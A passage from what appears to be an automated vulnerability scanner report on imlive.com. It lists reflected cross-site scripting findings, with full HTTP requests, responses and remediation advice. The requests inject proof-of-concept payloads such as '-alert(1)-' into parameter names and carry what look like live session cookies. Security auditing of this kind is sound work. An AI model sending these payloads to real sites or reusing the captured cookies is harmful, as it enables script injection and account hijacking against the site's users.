...[SNIP]...

2.66. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:01 GMT
Connection: close
Content-Length: 40531
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve
...[SNIP]...

2.67. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:35 GMT
Connection: close
Content-Length: 25631
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.68. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/adult-shows/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 25778
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.69. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:35 GMT
Connection: close
Content-Length: 226523
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1">
...[SNIP]...

2.70. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:10 GMT
Connection: close
Content-Length: 225335
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.71. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:10 GMT
Connection: close
Content-Length: 27644
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.72. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cam-girls/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:19 GMT
Connection: close
Content-Length: 27791
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

2.73. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 33620
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.74. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/cams-aroundthehouse/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1145a'-alert(1)-'9eeece25a26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
